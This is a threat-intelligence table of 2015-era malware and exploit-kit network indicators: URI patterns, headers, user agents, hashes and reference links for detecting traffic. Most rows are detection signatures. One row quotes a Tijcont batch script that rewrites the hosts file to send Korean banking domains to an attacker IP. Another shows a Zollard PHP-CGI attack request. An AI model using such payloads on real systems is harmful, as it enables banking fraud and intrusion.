2015 MALWARE TRAFFIC PATTERNS
1
added | type | family | method | uri | path2 | header | ua | port | notes | md5s | ref_url | dl_sample | dl_pcap | strings | analysis_date | Credit
2
2015-01-22CRIMECarberb / /GluptebaGET<p>/get_ads.php?yy=1&aid=2&atr=exts&src=199
<p>/go/p1011105.subexts
<p>/go/page/landing_page_68?nid=14&layout=qna&pid= p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1
<p>/javascript/live_cd/popunder_script-1400195675.js
<p>/images/ffadult/css/header.css
<p>/css/live_cd/ffadult/chinese/0/global_facelift-1414007370.css
<p>/get_ads.php?yy=1&aid
<p>/go/
<p>/live_cd/
<p>/ffadult/
8085acec48c593832bdd57f90aec783a28http://malware-traffic-analysis.net/2014/12/25/index.html
3
2015-01-22CRIMEFiesta EKGET<p>/?_SPMq=vahK1gfvq3&z1_Aj =fW8sL8ld&nkPgy= 81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf= fu5dv5&wDK9=Ydqk1z4o6&52YRK=eHl9jdJ8j&I86 __=He0S4m9G
&QPy3i=J4HP58S7h&dRPS8=7bi7Y
<p>/?3W_wN=I40_W5_&eht =t8vP8M8L&2ad_uO= 33KPa&_s3oi=8P5_7&QLfo= cHai8w&ZM7P_K=bSG7TH3p&UKb38= 1s4wx2s&jSJyB=cM7c
<p>/?sk9=7ufJ8Ky7H8nS34n7f1h8t887R49&eDf= 1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR
<p>/?_I4XS=idKbueq4kR1q8&0TsZ= Y0Wn7Lbr6K9hch&thXvW=56WPaqG2OdJ0&Ff_lty= x21dbrs8y5
<p>/?m_FxE=eh0&MkFq=H8GeS&fz7= 1l3&d2T6r=ae&LeH_9= k0Il2W&Z7i6=3S1&7h_ =Sdlc&zmGAU=i0uf&mMwf=ehp5p& ymV7T=y7lKe&Jpk_DF=_5_2
/?80http://malware-traffic-analysis.net/2014/12/26/index.html
4
2015-01-22CRIMEFiesta EKGET<p>/yzzzpiehxpvij8ps46znskyaqfa5ijkduakhxwcbj9
<p>/ai_qkvu2/4a374fcc5b4966050058040c015d5253005 2030f0f5201530f54070e0507525450;118800;94
<p>/ai_qkvu2/074f70a95a1651de5952585d020b5009040 4045e0c0403090b02005f0651500e54
/ai_qkvu2/80http://malware-traffic-analysis.net/2014/12/17/index.html
5
2015-01-22CRIMEGongdad / Gong Da compromised site redirectsGET<p>/pg/kcp/index.html
<p>/popup/index.html
<p>/my/by4.html
<p> is to create a new line break in the Web version of the table - Replace with Domain/IPhttp://malware-traffic-analysis.net/2014/12/13/index.html
6
2015-01-22CRIMEGongdad / Gong Da EKGET<p>/data/file/cr/index.html
<p>/data/file/cr/swfobject.js
<p>/data/file/cr/jquery-1.4.2.min.js
<p>/data/file/cr/main.html
<p>/data/file/cr/AyVpSf.jar
<p>/data/file/cr/com.class
<p>/data/file/cr/edu.class
<p>/data/file/cr/net.class
<p>/data/file/cr/org.class /windos.exe
/data/file/cr/<p> is to create a new line break in the Web version of the table - Replace with Domain/IPhttp://malware-traffic-analysis.net/2014/12/13/index.html
7
2015-01-22CRIMEDalexis LoaderGET<p>/tmp/pack.tar.gz
<p>/assets/pack.tar.gz
<p>/piwigotest/pack.tar.gz
<p>/histoiredesarts/pack.tar.gz
<p>/fit/pack.tar.gz
/pack.tar.gz80http://blog.malcovery.com/blog/ctb-locker-the-newest-crypto-malware-now-via-spam
8
2015-01-22APTGholee / Rocket KittenGET / POST<p>/index.php?c=Ud7atknq&r=17117d
<p>/index.php?c=Ud7atknq&r=1710b2
/index.php?c=80http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html
9
2015-01-22CRIMEZemotGET /b/shoe /b/shoe80http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.htmlhttp://bit.ly/aptsamples
10
2015-01-22CRIMEZemot DL via AsproxGET/catalog/159/catalog/15980https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdfhttp://bit.ly/crimesamples
11
2015-01-22CRIMEZemot downloading RovnixGET/mod_jshopping_products_gdle/mod_smartslider2//mod_smartslider2/80https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdfhttp://bit.ly/crimesamples
12
2015-01-22CRIMEZemot downloading RerdomGET/mod_jshoppi/soft32.dl/soft32.dl80https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdfhttp://bit.ly/crimesamples
13
2015-01-22CRIMERerdomGET/b/eve/<redacted>/b/eve/8080https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdfhttp://bit.ly/crimesamples
14
2015-01-22CRIMEClickfraud GET/b/req/<redacted>/b/req/80https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf
15
2015-01-22CRIMECidox / Rerdom / ClickfraudGET<p>/b/eve/e91425775cc5d7e657bd2cc7
<p>/b/letr/21D84379F768D95442B92BC5
<p>/b/opt/E1805AD5D79824076249D696
<p>/b/req/FDD953BA382388758DF27AE4
<p>/b/pkg/<redacted>
<p>/b/eve/
<p>/b/letr/
<p>/b/opt/
<p>/b/req/
<p>/b/pkg/
80http://www.malware-traffic-analysis.net/2014/07/21/index.html
16
2015-01-22CRIMECidox / Rerdom / Clickfraud - clickurl GETGET /x/48petqwk9/<redacted>/AA/0 /x/48petqwk9/80https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf
17
2015-01-22CRIMECidox / Rerdom / Clickfraud - clickurl GETGET/2014/06/26/new-game-tech-behind-scenes-sony -playstation with referrer http://controller-best.comreferrer http://controller-best.com80
18
2015-01-22APT / CRIMEScieron / Httneilc / HTClientpacket data <p>0000 16 03 01 00 41 01 00 00 3d 03 01 54 c1 2a fa 82
<p>0010 a5 0b 00 4c 7b 26 c9 33 81 bd 63 34 08 ab b3 38
<p>0020 3a de 83 db b1 9c 95 02 3e c3 34 00 00 16 00 04
<p>0030 00 05 00 0a 00 09 00 64 00 62 00 03 00 06 00 13
<p>0040 00 12 00 63 01 00
8081<p>http://www.symantec.com/security_response/writeup.jsp?docid=2014-072320-5920-99
<p>http://www.symantec.com/connect/blogs/scarab-attackers-took-aim-select-russian-targets-2012
http://bit.ly/aptsampleshttp://bit.ly/aptpcaps
19
2015-01-22CRIMEZollard RFIPOST/cgi-bin/php? %2D%64+%...<long string removed php encoded>...%2D%6E/cgi-bin/php?Host: <target server>
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1825
Connection: close
Mozilla/5.0 (compatible; Zollard; Linux)80
20
2015-01-21CRIMEUpatreGET<p>/js/jquery-1.41.15.js
<p>/js/jquery-1.41.15.js?aCNDrnl3=[user-agent string]&hjmcSOLrVb5fK5a =1846&kZuJV1OyPrXdK0= 1267859342&OjyOcmABhJHuu=gDyC5hx734Wu1.js
<p>/js/jquery-1.41.15.js?get_message=3290013886
/js/jquery-1.41.15.js80<p> is to create a new line break in the Web version of the table - Replace with Domain/IPa752bedbbf6b73e52e2d7f8f3cd6a227 <p> 2c7810794a5027ddfc0568808dea3437http://malware-traffic-analysis.net/2015/01/21/index.htmlhttp://malware-traffic-analysis.net/2015/01/20/index2.html
21
2015-01-21CRIMECryptowall 3.0POST<p>http://proxy1-1-1.i2p/fee4roy2hih9
<p>http://payto4gtpn5czl2.torforall.com/ofs20c
i2p
torforall.com/ofs20c
80e67edfaa0d65e822fe41bf978ccd9c3chttps://isc.sans.edu/diary/Traffic+Patterns+For+CryptoWall+30/19203https://malwr.com/analysis/MDA0MjIzOGFiMzVkNGEzZjg3NzdlNDAxMDljMDQyYWQ/
22
2015-01-21CRIMEAndromedaPOST/ldr.php/ldr.phpAccept: text/html, application/xhtml+xml, */*::~~Content-Type: application/x-www-form-urlencoded::~~Accept-Language: en-US:: ~~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko80
23
2015-01-21CRIMEAngler EK ChainGET/t19jl0hvv2.php80
24
2015-01-21CRIMEAngler EK ChainGET/752s2n0ndw.php80
25
2015-01-21CRIMEAngler EK ChainGET/erL0pIvz9_wyAlk2koy7L4b2qScYutODp2Cm dYZyW hw1bW9lGM8EDW8cKKjx47cp80
26
2015-01-21CRIMEAngler EK ChainGET/P-SqI9OgILhp9clsf2ne5wgWHy4i2ew2hy 48WScNKA 9m2DKeiJNTp7gSxYSPcXsN80
27
2015-01-21CRIMEAngler EK ChainGET/models/runway/ring/header.js80
28
2015-01-21CRIMEAngler EK ChainGET/code/decrease/revenue/core.js80
29
2015-01-21CRIMEAsprox / KuluozGET/include.php?t=20lB5S+e4qW48vWs/RXbneRWTR9t JTB67xoumOnEvak=
<p>HTTPS over port 443 as a possible connectivity check
/include.php?t=80http://malware-traffic-analysis.net/2015/01/02/index.html
30
2015-01-21CRIMEAsprox / KuluozPOST/index.php/index.php80http://malware-traffic-analysis.net/2015/01/02/index.html
31
2015-01-21CRIMEChanitorPOST/gate.php/gate.phpMozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.080
32
2015-01-21CRIMEChanitor DownloadsGET<p>/wp-includes/js/tinymce/plugins/wpfullscreen/1.php
<p>/wp-includes/js/tinymce/skins/lightgray/1.php
<p>/wp-content/plugins/motopress-content-editor /flexslider/fonts/1.php
<p>/wp-includes/js/tinymce/plugins/wpfullscreen/1.php
/1.php80
33
2015-01-21CRIMECryptowallPOST<p>/532boskc3i0
<p>/nvebi4m4ggdokz
<p>/wbkljtzpimbryt
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)80
34
2015-01-21CRIMECryptowallGET
<p>/wp-content/themes/exiportal/dh5x3a1815j
<p>/wp-content/themes/esther/6l7de
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)80
35
2015-01-21CRIMEDridex payloadGET<p>/mopsi/popsi.php
<p>/js/bin.exe
/popsi.php
/bin.exe
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)80
36
2015-01-21CRIMEFake AV post compromiseGET/?0=13&1=1&2=15&3=i&4=7600&5=0&6=1111&7 =kyxnujmwnn80http://www.malwaresigs.com/2014/02/07/fakeav-is-still-alive/
37
2015-01-21CRIMEFiesta EKGET<p>/txf9p_v8/ye1PlchZ7X9pFcl0o-y3
<p>/txf9p_v8/14dcb5b6b53272fd050d5358500e540100 0750585657520d0400060703005305 ;114402;287
<p>/txf9p_v8/4dc239e53174afbc5d010f0901025302055 75709075b550e01500156520c5406
/txf9p_v8/80http://malware-traffic-analysis.net/2015/01/20/index.html
38
2015-01-21CRIMEFlashpack EKGET/sv62a76d18537/index.php/index.php80
39
2015-01-21CRIMEGameThiefPOST/tj.asp/tj.asp80
40
2015-01-21CRIMEGameThiefGET/count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP& iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack/count.asp?mac=80http://malware-traffic-analysis.net/2015/01/03/index.html
41
2015-01-21CRIMEGypothyGET/bigbight/kinkong.txt
/kinkong.txt~~Accept-Language: en-US::~~Accept-Encoding: gzip, deflate::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)::~~Host: adakaobiri.com::~~Connection: Keep-Alive::~~Accept-Language: en-US::~~Accept-Encoding: gzip, deflate::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)80
42
2015-01-21CRIMEH-W0rmPOST/SpCoderHere|pcname|hostname|username .. other pc data80
43
2015-01-21CRIMEKaiXin EKGET<p>/indexindex/
<p>/indexindex/gg.jpg
<p>/indexindex/jquery-1.4.2.min.js
<p>/indexindex/swfobject.js
<p>/indexindex/main.html
<p>/xzz1.exe
<p>/indexindex/NlNwQh.jar
<p>/indexindex/com.class
<p>/indexindex/edu.class
<p>/indexindex/net.class
<p>/indexindex/org.class
/indexindex/80http://malware-traffic-analysis.net/2015/01/03/index.html
44
2015-01-21CRIMEKovterPOST<p>/9/form.php
<p>/11/form.php
<p>/w1/form.php
<p>/1/feed.php
/form.phpContent-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MALC; rv:11.0) like Gecko
Host: b7-golfix.org
Content-Length: 368
Cache-Control: no-cache
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MALC; rv:11.0) like Gecko80
45
2015-01-21CRIMENuclear EKGET / POST<p>/XhBWV0gBT08OVFVW.html
<p>/AwoVGwxQAEcOVRleDlRTBgMFR0tUV1YOVFcAHA JDQUhXVlxUVgdOVRtA
<p>/ABsJAkgKUURCGlYaShlWAAACQUJfV1RCGVYEBh 1GRlVLVEJLVgUBT0AONi0fCB0j
80http://malware-traffic-analysis.net/2015/01/18/index2.html
46
2015-01-21CRIMEPoweliksGET<p>/query?version=1.7&sid=1101&builddate=201214&q= low+testosterone+in+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
<p>/query?version=1.7&sid=1101&builddate=201214&q= fast+weight+loss&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
<p>/query?version=1.7&sid=1101&builddate=201214&q= pain+in+knee+cap&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
<p>/query?version=1.7&sid=1101&builddate=201214&q= anti+aging+cream+for+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; I Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2
?version=1.7&sid= ls=2Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)80
47
2015-01-21CRIMERedirect to Fiesta EKGET/?iVXpY9be=J8v3ax4v1&V5=1lM9es5-U2&npv_F-g= aPp8X- 02- GbU&b-nd9=-2-7nwdGa9Y&_6nQ=Y90gT9oPejrdO &
m_h=bv_8fzs0m6H&Zg_-tWd=f-bj0I9sai&hfUK=b3
80http://malware-traffic-analysis.net/2015/01/20/index.html
48
2015-01-21CRIMESweet Orange EKGET<p>/admin4_account/mobile/movies.php?timeline=18
<p>/bad/generic/help.php?state=39
<p>/cnet/tmp/Indy_admin/investor.php?setup=20
<p>/dbadmin/wp-admin/hex/help.php?state=33
<p>/forums/example/screens/investor.php?setup=20
<p>/gcc/tmp/bad/help.php?state=25
<p>/ip/ch/investor.php?setup=20
<p>/profiles/stat/movies.php?timeline=21
<p>/timeline=18
<p>/state=39
<p>/setup=20
<p>/state=33
<p>/state=25
<p>/timeline=21
<p>/timeline=20
<p>/france=155
<p>/state=31
49
2015-01-21CRIMESweet Orange EKGET<p>/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064
<p>/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064&errfix=urepair
<p>/printer.php?rates=1764&catalogp=4&pixel=294&speeches=171 &shows=2171&trans=867&misc=1087&urepair=errfix
<p>/store.php?back=669&nav_m=75&sendmail=4&stats=1186 &logout=171&state=2215&CRIME=2249
<p>/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535
<p>/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535&repfix=fixutil
<p>/teen.php?cpan=2441&soma=4&subs=2093&pipermail=171 &feed=2093&film=663&comp=954
<p>/serial.php?help=805&browsers=4&about=2398&icons=171 &music=247&sony=430&work=2315

<p>/printer.php
<p>/store.php
<p>/teen.php
<p>/serial.php

<p>/fixutil=repfix
<p>/repfix=fixutil
80
50
2015-01-21CRIMETBDPOST /store/ /store/80http://malware-traffic-analysis.net/2015/01/20/index2.html
51
2015-01-21CRIMETBD Post FlashpackGET<p>/r?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ
<p>/search?q=wrestling&subid=4699
<p>/click?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ
/r?q= /search?q= /click?q=80http://malware-traffic-analysis.net/2015/01/20/index.html
52
2015-01-21CRIMETBD Proxy (Htbot?)GET<p>/ocfg.php?command=getip
<p>/ocfg.php?command=getid
<p>/ocfg.php?command=ghl&id=1493496
<p>/ocfg.php?command=dl&id=1493496
<p>/ocfg.php?command=version&id=1493496
<p>/ocfg.php?command=getbackconnect
<p>/pointer.php?proxy=<IP>%3A24635&secret=BER5w4evtjszw4MBRW
/ocfg.php?command=80http://malware-traffic-analysis.net/2015/01/12/index.html
53
2015-01-21CRIMEUpatreGET<p>/1501us22/<PC--NAME>/0/51-SP3/0/
<p>/1501us22/<PC--NAME>/1/0/0/
<p>/2807cw/<PC-Name>/1/0/0/
<p>/2807cw/<PC-Name>/41/5/4/
<p>/2807cw/<PC-Name>/0/51-SP2/0/
<p>/1201uk1/<PC-Nam/0/61/0/
<p>/1201uk1/<PC-Name>/0/51-SP3/0/
<p>/1201uk1/<PC-Name>/1/0/0/
<p>/1201uk1/<PC-Name>/41/7/4/ "
<p>/2307stat/<PC-Name>/0/51Service%20Pack%202/0/
<p>/2307stat/<PC-Name>/1/0/0/
<p>/2307stat/<PC-Name>/41/5/4/

<p>/1201uk1/
<p>/2307stat/
<p>/2807cw/
<p>/1501us22/
Mozilla/5.0, Host: <IP:port>, Cache-Control: no-cache80
54
2015-01-21CRIMEVavtrak / NeverquestPOST/collection/0000004E/00/9EBD6132/collection/80http://malware-traffic-analysis.net/2015/01/18/index2.htmlhttp://malware-traffic-analysis.net/2015/01/18/index2.html
55
2015-01-21CRIMEZeusGET<p>/backup/config.bin
<p>/en/images/config.bin
<p>/guardnow/config.bin
<p>/guardnow/config.bin
/config.binAccept: */*::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)::~~Host: 104.192.103.10::~~Content-Length: 128::~~Connection: Keep-Alive::~~Cache-Control: no-cache::~~::~~\030\206-yV\264;\376[\270\021\244(k\353\253\001\206\311\376^\336AGZp\323\342E\324\325\323\333"\342\234\010\214\255\257\363S\343f$\274)\356=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)80
56
2015-01-21CRIMEZeusPOST/choosen/helps/file.php/helps/file.phpAccept: */*::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)::~~Host: 104.192.103.10::~~Content-Length: 128::~~Connection: Keep-Alive::~~Cache-Control: no-cache::~~::~~\030\206-yV\264;\376[\270\021\244(k\353\253\001\206\311\376^\336AGZp\323\342E\324\325\323\333"\342\234\010\214\255\257\363S\343f$\274)\356=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)80
57
2015-01-20CRIMEAdWare Kraddare.ILGET/bv/config.php?q=^/irW@RwOC6RKkFiJgWt_ESwGQKBP... <very long string> ..@RwNPRwNN::/config.php?q=^/irW@80http://totalhash.com/analysis/4851fcb8933220d2cb1187ab769bf96e3624b2ed
58
2015-01-20CRIMEAdWare Kraddare.ILPOST/bv/config.php/config.php80http://totalhash.com/analysis/4851fcb8933220d2cb1187ab769bf96e3624b2ed
59
2015-01-20CRIMEDyreGET/2001uk11/HOME/1/0/0//HOME/1/0/0/User-Agent: Mozilla/5.0
Host: 202.153.35.133:33384
Cache-Control: no-cache
Mozilla/5.080https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/
60
2015-01-20CRIMEDyreGET/mandoc/eula012.pdf/eula012.pdfAccept: text/*, application/*
User-Agent: Mozilla/5.0
Host: clicherfort.com
Cache-Control: no-cache
Mozilla/5.080https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/
61
2015-01-20CRIMEDyreGET/mandoc/ml1from1.tar/ml1from1.tarUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Host: essextwp.org
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/
62
2015-01-20CRIMEDyre plugin dlGET/ineede900.rar80
63
2015-01-20CRIMEKazyGET/cmd/api.php?mk=20140708041847777&action= get_availability&partoffer_id=11229&a2=FR/api.php?mk=80https://www.virustotal.com/en/file/411e52c674faac375570a8786bf88bd849dbccc4aaa895aa59c6a3c0c568ccac/analysis/
64
2015-01-20CRIMEMudropGET/gcs?alpha=YBvfs8NDNYK3vSEO+ p6fL2KZts4yS8inp2oWpqiDOinE/IJmP6Ktx9+Px+c=/gcs?alpha=Host: api.greenerweb.info
Cache-Control: no-store,no-cache
Pragma: no-cache
Connection: Keep-Alive
65
2013-11-12CRIMEChePro (Brazil.banker)GET/ini/xvwmmwb.mod/xvwmmwb.modAccept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.aspramece.com.br
Connection: Keep-Alive
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)embedded in RTF2A5E5D3C536DA346849750A4B8C8613A (RTF dropper)
6D78F17AC2E4B95A671B079F25DD3B79 (RTF dropper)
http://www.securelist.com/en/blog/208214122/Brazilian_bankers_gone_wild_now_using_malicious_Office_fileshttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/11/brazilian-bamker-cinternetbankingcpl.html11/12/2013
66
2013-10-15CRIMECryptolockerPOST/home//home/Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: rwyngtbvunfpk.org
Content-Length: 192
Connection: Close
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)crypt_1_sell23-09.exe_9cbb128e8211a7cd00729c159815cb1chttp://nakedsecurity.sophos.com/2013/10/12/destructive-malware-cryptolocker-on-the-loose/http://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/10/cryptolocker-strings-CRIME.html10/14/2013
67
2013-09-10CRIMEReedum220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254]
USER user37704
331 .................. ............ ...... ........................ user37704
PASS intro22
230 ........................ user37704 ..................
TYPE A
200 ...... .................... .. A
PORT 10,0,2,15,4,24
500 ........................ .............. PORT
LPRT 6,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,4,24
500 LPRT .... ....................
0ca4f93a848cf01348336a8c6ff22dafhttp://www.naked-security.com/malware/Infostealer.Reedum/http://bit.ly/crimesampleshttp://bit.ly/crimepcaps3/1/2013
68
2013-09-09APTVidgrabPOST(172.16.253.130)|1067|WinXP|D|L|No| 0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|.....3
HTTP/1.1 301 Moved Permanently
Location:http://windowsupdate.microsoft.com/
Content-Type: text/html
Connection: Keep-Alive
<h1>Bad Request (Invalid Verb)</h1>
.....HK|(172.16.253.130)|1067|WinXP|D|L|No|0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|.
660709324acb88ef11f71782af28a1f0http://contagiodump.blogspot.com/2013/09/sandbox-miming-cve-2012-0158-in-mhtml.html#morehttp://bit.ly/aptsampleshttp://bit.ly/aptpcapshttp://contagioexchange.blogspot.com/2013/09/vidgrab-strings-apt.html9/8/2013
69
2013-09-08APTPage / stscout / Elise / lStudio / WuminsGET/29af9cdc/page_12082223.html/page_Accept: */*
Cookie: XX=0; BX=0
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
Host: gorush.dyndns-web.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
Mozilla/4.0 (compatible; MSIE 8.0; Win32)443aaf73666cbd750ed22b80ed836d2b1e4http://www.fireeye.com/blog/technical/exploits-vulnerabilities/2012/09/analysis-of-malware-page.html#morehttp://bit.ly/aptsampleshttp://bit.ly/aptpcapshttp://contagioexchange.blogspot.com/2013/09/page-elise-lstudio-wumins-strings-apt.html9/8/2013
70
2013-09-08CRIMETijcontGET/s/blog_b2afd7fe01019tkf.htm/blog_/3.txt
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: 110.34.198.123:888
Connection: Keep-Alive

/s/blog_b2afd7fe01019tkf.html
User-Agent: getURLDown
Host: blog.sina.com.cn

/album/w=1600;q=90/sign=862e65d610dfa9ecfd2e521152e0cc72/9358d109b3de9c82a5a5fe456d81800a18d84333.jpg
User-Agent: loadMM
Host: e.hiphotos.bdimg.com
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) ** User-Agent: getURLDown ** User-Agent: loadMM80,6000,8888,C2 Server reply

@echo off
echo.
del %systemroot%\system32\drivers\etc\hosts.ics
echo 67.198.255.93 ibs.kfcc.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics
echo 67.198.255.93.ibs.kfcc.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics
echo 67.198.255.93 online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics
echo 67.198.255.93.online.keb.co.kr>>%systemroot%\system32\drivers\etc\hosts.ics
echo 67.198.255.93 open.hanabank.com>>%systemroot%\system32\driver....
etc
845b0945d5fe0e0aaa16234dc21484e0http://my.opera.com/cjbi/blog/index.dml/tag/Tijconthttp://bit.ly/crimesampleshttp://bit.ly/crimepcapshttp://contagioexchange.blogspot.com/2013/09/tijcont-strings-CRIME.html9/8/2013
71
2013-09-08APTDarkcometGET/a.php?id=c2ViYWxpQGxpYmVyby5pdA==/a.php?id=/a.php?id=c2ViYWxpQGxpYmVyby5pdA==
Host: [ip.address]
nonedc98abba995771480aecf4769a88756ehttp://www.contextis.com/research/blog/malware-analysis-dark-comet-rat/http://bit.ly/aptsampleshttp://bit.ly/aptpcapshttp://contagioexchange.blogspot.com/2013/09/dark-comet-strings-apt.html9/8/2013
72
2013-09-08CRIMEKelihosGET/index.htm/index.htm
Host: 188.129.243.106
Content-Length: 164
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0

..D.lUUE..H@.q..#.....K.zfgE0F.A..K.

Variants:
/default.htm ** /file.htm ** /home.htm ** /index.htm ** /install.htm ** /login.htm ** /main.htm ** /online.htm ** /search.htm ** /setup.htm ** /start.htm ** /index.htm
Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)
Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)
Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3)
Mozilla/5.0 (Windows NT 5.0; rv:21.0)
Mozilla/5.0 (Windows NT 5.1)
Mozilla/5.0 (Windows NT 5.1; rv:21.0)
Mozilla/5.0 (Windows NT 6.1; rv:21.0)
